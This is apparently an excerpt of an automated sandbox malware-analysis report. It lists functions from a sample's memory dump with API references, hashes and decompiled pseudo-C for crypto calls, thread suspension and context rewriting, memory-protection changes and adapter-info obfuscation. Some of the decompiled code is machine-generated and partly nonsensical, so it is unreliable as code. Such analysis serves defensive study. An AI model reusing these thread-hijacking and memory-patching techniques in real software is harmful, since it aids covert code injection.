                                                                                                                        • Opcode Fuzzy Hash: 5d321b888b41c347f2749d2d1c218793ea62b190ebd0ae8cb31b33e59316caf1
                                                                                                                        • Instruction Fuzzy Hash: B02191735083A4AFD210DE55DC80EABBBE9EFC47B4F440B1DF59486180C775E5458B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0049B4A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55encryptionCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0049B4A7
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000050,0049B33F,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?), ref: 0049B50A
                                                                                                                          • Part of subcall function 0049B225: __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                                          • Part of subcall function 0049B225: GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0049B53B
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AcquireContextCryptErrorExceptionException@8H_prolog3H_prolog3_catchLastRaiseThrow_malloc
                                                                                                                        • String ID: CryptAcquireContext
                                                                                                                        • API String ID: 3486300381-714834122
                                                                                                                        • Opcode ID: 9c6a205f110786291e9a80d2f64064bf27fcdafd48b42f2ec411cbc90d7bb92d
                                                                                                                        • Instruction ID: 4aa91081fb9cf29067d9f316b913320168a5be26f9ed3d768d26055c8915dce9
                                                                                                                        • Opcode Fuzzy Hash: 9c6a205f110786291e9a80d2f64064bf27fcdafd48b42f2ec411cbc90d7bb92d
                                                                                                                        • Instruction Fuzzy Hash: 2811E770909355AAEB10DFE8ED89BAF7FA8FB01704F08442EF101D7282C7B95E448794
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0049B32E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0049B335
                                                                                                                          • Part of subcall function 0049B4A0: __EH_prolog3_catch.LIBCMT ref: 0049B4A7
                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,00000048,0049B3AE,?,?,00000004,0049B3DC,?,?,?,0000000C,004F6CCF,?,?), ref: 0049B348
                                                                                                                          • Part of subcall function 0049B225: __EH_prolog3.LIBCMT ref: 0049B22F
                                                                                                                          • Part of subcall function 0049B225: GetLastError.KERNEL32(00000010,0000008C,0049B532,?,?,CryptAcquireContext), ref: 0049B239
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0049B379
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CryptErrorExceptionException@8H_prolog3_catchLastRaiseRandomThrow
                                                                                                                        • String ID: CryptGenRandom
                                                                                                                        • API String ID: 3896132652-3616286655
                                                                                                                        • Opcode ID: 55599ae50852dde39a2b350bae986ab6efdd030da4e79697fed3590d4eace3be
                                                                                                                        • Instruction ID: 0b8e54217ba43ac14e11ff312a9233512deb590aa70a2d3a4b8af42d778110ac
                                                                                                                        • Opcode Fuzzy Hash: 55599ae50852dde39a2b350bae986ab6efdd030da4e79697fed3590d4eace3be
                                                                                                                        • Instruction Fuzzy Hash: CFF01C72900109AADF00EBE0D94AFDD7B7CEF58315F40842AF601E6151DB7C96088B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B270, Relevance: 4.5, APIs: 3, Instructions: 37nativememorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B270(void** _a4) {
				void* _t6;
				void* _t7;
				void** _t13;
				signed int _t17;
				void* _t20;
				void* _t22;

				_t13 = _a4;
				if( *_t13 != 0) {
					_t17 = 0;
					if(_t13[2] <= 0) {
						L7:
						_t7 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x2700000
						return HeapFree(_t7, 0,  *_t13);
					}
					do {
						_t20 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t13 + _t17 * 4)));
						_t22 = _t22 + 0xc;
						if(_t20 != 0) {
							NtResumeThread(_t20, 0); // executed
							NtClose(_t20); // executed
						}
						_t17 = _t17 + 1;
						_t5 =  &(_t13[2]); // 0xc30cc483
					} while (_t17 <  *_t5);
					goto L7;
				}
				return _t6;
			}









                                                                                                                        0x6f33b271
                                                                                                                        0x6f33b278
                                                                                                                        0x6f33b27b
                                                                                                                        0x6f33b280
                                                                                                                        0x6f33b2b0
                                                                                                                        0x6f33b2b2
                                                                                                                        0x00000000
                                                                                                                        0x6f33b2c1
                                                                                                                        0x6f33b283
                                                                                                                        0x6f33b292
                                                                                                                        0x6f33b294
                                                                                                                        0x6f33b299
                                                                                                                        0x6f33b29e
                                                                                                                        0x6f33b2a4
                                                                                                                        0x6f33b2a4
                                                                                                                        0x6f33b2a9
                                                                                                                        0x6f33b2aa
                                                                                                                        0x6f33b2aa
                                                                                                                        0x00000000
                                                                                                                        0x6f33b2af
                                                                                                                        0x6f33b2c3

                                                                                                                        APIs
                                                                                                                        • HeapFree.KERNEL32(02700000,00000000,?,00000000,?,6F33B44C,?,74784970,00000000), ref: 6F33B2BB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtResumeThread.NTDLL ref: 6F33B29E
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B2A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseFreeHeapOpenResume
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3496683721-0
                                                                                                                        • Opcode ID: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction ID: 1110496f906885189f1328f8116ef6c67dc1c1d5a7e4159772a5dde71de7bcf8
                                                                                                                        • Opcode Fuzzy Hash: c1cc83cd3f9f891f5b0d1ff0983db00ad9b7c5cc7873872af16f63d64a6beb10
                                                                                                                        • Instruction Fuzzy Hash: E9F05E32A41A70AFDB11EA54CC81F5A33A9AB89751F104255F904EF285CB75BC42CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33AFC0, Relevance: 3.1, APIs: 2, Instructions: 71nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33AFC0(signed int __eax, void* _a4, intOrPtr _a8) {
				void* _v0;
				long _v536;
				intOrPtr _v540;
				struct _CONTEXT _v716;
				struct _CONTEXT _v720;
				void* __edi;
				long _t16;
				intOrPtr _t19;
				long _t20;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;
				long _t37;
				signed int _t39;
				void* _t40;
				intOrPtr _t41;

				_t41 = _a8;
				_t39 = __eax;
				_v716 = 0x10001;
				_t16 = NtGetContextThread(_a4,  &_v716); // executed
				if(_t16 < 0) {
					L19:
					return _t16;
				}
				if(_t39 != 0xffffffff) {
					_t16 = _t39 + 1;
				} else {
					_t16 =  *0x6f340958; // 0x1f
					_t39 = 0;
				}
				if(_t39 >= _t16) {
					goto L19;
				} else {
					_t27 = _t39 * 0x2c;
					_t37 = _v536;
					_t40 = _t16 - _t39;
					do {
						_t32 =  *0x6f340950; // 0x27005a8
						_t19 = _t41;
						_t30 = _t27 + _t32;
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							if(_t19 == 1) {
								_t20 = 1;
							} else {
								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
							}
						}
						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
							if(_t20 == 0) {
								_t20 = E6F33AF50(_t30, _t37);
							} else {
								_t20 = E6F33AF90(_t30, _t37);
							}
							if(_t20 != 0) {
								_v536 = _t20;
								_t20 = NtSetContextThread(_v0,  &_v720);
								_t37 = _v540;
							}
						}
						_t27 = _t27 + 0x2c;
						_t40 = _t40 - 1;
					} while (_t40 != 0);
					return _t20;
				}
			}



















                                                                                                                        0x6f33afce
                                                                                                                        0x6f33afd6
                                                                                                                        0x6f33afde
                                                                                                                        0x6f33afe6
                                                                                                                        0x6f33afed
                                                                                                                        0x6f33b099
                                                                                                                        0x6f33b099
                                                                                                                        0x6f33b099
                                                                                                                        0x6f33aff6
                                                                                                                        0x6f33b001
                                                                                                                        0x6f33aff8
                                                                                                                        0x6f33aff8
                                                                                                                        0x6f33affd
                                                                                                                        0x6f33affd
                                                                                                                        0x6f33b006
                                                                                                                        0x00000000
                                                                                                                        0x6f33b00c
                                                                                                                        0x6f33b00f
                                                                                                                        0x6f33b015
                                                                                                                        0x6f33b01c
                                                                                                                        0x6f33b020
                                                                                                                        0x6f33b020
                                                                                                                        0x6f33b028
                                                                                                                        0x6f33b02b
                                                                                                                        0x6f33b02e
                                                                                                                        0x6f33b046
                                                                                                                        0x6f33b030
                                                                                                                        0x6f33b031
                                                                                                                        0x6f33b03f
                                                                                                                        0x6f33b033
                                                                                                                        0x6f33b03a
                                                                                                                        0x6f33b03a
                                                                                                                        0x6f33b031
                                                                                                                        0x6f33b053
                                                                                                                        0x6f33b057
                                                                                                                        0x6f33b060
                                                                                                                        0x6f33b059
                                                                                                                        0x6f33b059
                                                                                                                        0x6f33b059
                                                                                                                        0x6f33b067
                                                                                                                        0x6f33b070
                                                                                                                        0x6f33b07d
                                                                                                                        0x6f33b082
                                                                                                                        0x6f33b082
                                                                                                                        0x6f33b067
                                                                                                                        0x6f33b089
                                                                                                                        0x6f33b08c
                                                                                                                        0x6f33b08c
                                                                                                                        0x00000000
                                                                                                                        0x6f33b090

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction ID: 59cad453644579db8a67e217b24814fed65208902995dc2cc9b906cd707c02dc
                                                                                                                        • Opcode Fuzzy Hash: 791f88ce847011e75ce08c519c07f3376362838ceb7ca481528e20c2b565c925
                                                                                                                        • Instruction Fuzzy Hash: C221EE33A087F54BD720DB68C9807AA77D9EB85350F40062AD4B4CB180D735E94587A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B1F0, Relevance: 3.0, APIs: 2, Instructions: 42nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B1F0(long** __eax, intOrPtr _a4) {
				signed int _v0;
				void* __esi;
				long _t10;
				signed int _t16;
				void* _t21;
				intOrPtr* _t23;
				void* _t24;

				_t23 = __eax;
				 *__eax = 0;
				__eax[1] = 0;
				__eax[2] = 0;
				_t10 = E6F33B0A0(__eax);
				if( *_t23 != 0) {
					_t16 = 0;
					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
						L7:
						return _t10;
					}
					do {
						_t10 = E6F33AE20(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
						_t21 = _t10;
						_t24 = _t24 + 0xc;
						if(_t21 != 0) {
							NtSuspendThread(_t21, 0); // executed
							E6F33AFC0(_v0, _t21, _a4);
							_t24 = _t24 + 8;
							_t10 = NtClose(_t21);
						}
						_t16 = _t16 + 1;
					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
					goto L7;
				}
				return _t10;
			}










                                                                                                                        0x6f33b1f1
                                                                                                                        0x6f33b1f3
                                                                                                                        0x6f33b1f9
                                                                                                                        0x6f33b200
                                                                                                                        0x6f33b207
                                                                                                                        0x6f33b20f
                                                                                                                        0x6f33b212
                                                                                                                        0x6f33b217
                                                                                                                        0x6f33b25f
                                                                                                                        0x00000000
                                                                                                                        0x6f33b25f
                                                                                                                        0x6f33b220
                                                                                                                        0x6f33b22a
                                                                                                                        0x6f33b22f
                                                                                                                        0x6f33b231
                                                                                                                        0x6f33b236
                                                                                                                        0x6f33b23b
                                                                                                                        0x6f33b24a
                                                                                                                        0x6f33b24f
                                                                                                                        0x6f33b253
                                                                                                                        0x6f33b253
                                                                                                                        0x6f33b258
                                                                                                                        0x6f33b259
                                                                                                                        0x00000000
                                                                                                                        0x6f33b25e
                                                                                                                        0x6f33b261

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                          • Part of subcall function 6F33B0A0: NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                          • Part of subcall function 6F33B0A0: GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                          • Part of subcall function 6F33B0A0: HeapAlloc.KERNEL32(02700000,00000000,00000200), ref: 6F33B16A
                                                                                                                          • Part of subcall function 6F33B0A0: VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                          • Part of subcall function 6F33AE20: NtOpenThread.NTDLL ref: 6F33AE72
                                                                                                                        • NtSuspendThread.NTDLL(00000000,00000000), ref: 6F33B23B
                                                                                                                          • Part of subcall function 6F33AFC0: NtGetContextThread.NTDLL ref: 6F33AFE6
                                                                                                                          • Part of subcall function 6F33AFC0: NtSetContextThread.NTDLL ref: 6F33B07D
                                                                                                                        • NtClose.NTDLL(00000000), ref: 6F33B253
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1213046356-0
                                                                                                                        • Opcode ID: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction ID: 04efed0e7fd23f17494e9e287c7278ae8680cabaab1548e4dac6af3f4c6b1888
                                                                                                                        • Opcode Fuzzy Hash: fda802fac529570a5fae9d01751d31134b81a8678d2a2070ab73c5883b53041c
                                                                                                                        • Instruction Fuzzy Hash: 7701FF7A9007659BD320CF14E8C0B6BB3E4AF80709F20462DE9958B280D3B57845CA62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33AD39, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33AD39(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				void* _t71;
				long _t97;

				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
				 *__ebx =  *__ebx + _t71;
				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
				_push(__ecx);
				_v4 = _a4;
				_a4 = _a8;
				_t97 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t97 > 0x00000000;
			}






                                                                                                                        0x6f33adab
                                                                                                                        0x6f33adad
                                                                                                                        0x6f33adbf
                                                                                                                        0x6f33addf
                                                                                                                        0x6f33ade0
                                                                                                                        0x6f33adee
                                                                                                                        0x6f33adf7
                                                                                                                        0x6f33ae07
                                                                                                                        0x6f33ae16

                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction ID: 6de7b3b9f436ebfc59c6c26f42391e41fc78e96b05a2420a815dc052ffe9dcf1
                                                                                                                        • Opcode Fuzzy Hash: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction Fuzzy Hash: 49F0FE761083519FC705CF58CC92A5A77E4AF9A710B148A5DE0A5C7684D730E414DB23
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3382F0, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F3382F0(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t12;
				signed int _t15;
				intOrPtr _t18;
				signed char* _t19;
				intOrPtr* _t27;

				_t12 = _a8;
				_t27 = _a4;
				_push(_t12);
				_push(_t27); // executed
				M6F340600(); // executed
				_t18 = _t12;
				if(_t27 != 0 && _t18 == 0) {
					do {
						if( *((intOrPtr*)(_t27 + 0x190)) <= 3) {
							goto L6;
						}
						_t19 = _t27 + 0x197;
						do {
							_t15 = ( *_t19 & 0x000000ff) + M6F3404BC + M6F3404E4;
							_t19 =  &(_t19[1]);
							 *((char*)(_t19 - 1)) = _t15 % 0xff;
						} while (0xfffffe6c + _t19 <  *((intOrPtr*)(_t27 + 0x190)));
						L6:
						_t27 =  *_t27;
					} while (_t27 != 0);
					return _t18;
				}
				return _t12;
			}








                                                                                                                        0x6f3382f0
                                                                                                                        0x6f3382f6
                                                                                                                        0x6f3382fa
                                                                                                                        0x6f3382fb
                                                                                                                        0x6f3382fc
                                                                                                                        0x6f338302
                                                                                                                        0x6f338306
                                                                                                                        0x6f338310
                                                                                                                        0x6f338317
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33831e
                                                                                                                        0x6f338330
                                                                                                                        0x6f33833b
                                                                                                                        0x6f338348
                                                                                                                        0x6f338349
                                                                                                                        0x6f33834f
                                                                                                                        0x6f338357
                                                                                                                        0x6f338357
                                                                                                                        0x6f338359
                                                                                                                        0x00000000
                                                                                                                        0x6f338360
                                                                                                                        0x6f338363

                                                                                                                        APIs
                                                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6F3382FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AdaptersInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177971545-0
                                                                                                                        • Opcode ID: ee61f07b029e858cfd4bd5b341b8e7d4da8ef7fb06ddbef56b479880b18d98b4
                                                                                                                        • Instruction ID: ed9d7500124e4a7573094c9b3134be4986b01b8681d55c9cca2cccdd3bf927a3
                                                                                                                        • Opcode Fuzzy Hash: ee61f07b029e858cfd4bd5b341b8e7d4da8ef7fb06ddbef56b479880b18d98b4
                                                                                                                        • Instruction Fuzzy Hash: 9A01F43BA09A608FC311DA1CC8909EBF3ADBF96374F09452EE995C7300C772B8058790
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33ADE0, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33ADE0(long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				long _t13;

				_v4 = _a4;
				_a4 = _a8;
				_t13 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t13 > 0x00000000;
			}





                                                                                                                        0x6f33adee
                                                                                                                        0x6f33adf7
                                                                                                                        0x6f33ae07
                                                                                                                        0x6f33ae16

                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction ID: b78477e4b6319e3045174737d7de5677868566ed5ca31fd5eddb96b3805b58a4
                                                                                                                        • Opcode Fuzzy Hash: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction Fuzzy Hash: B9E0BFB620C342AF8748CF58D951C5BB3E8ABC8720F10CA1DB1BAC3690D730D8088B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335690, Relevance: 72.0, APIs: 33, Strings: 8, Instructions: 281networkmemorysleepCOMMON
                                                                                                                        Download Yara Rule
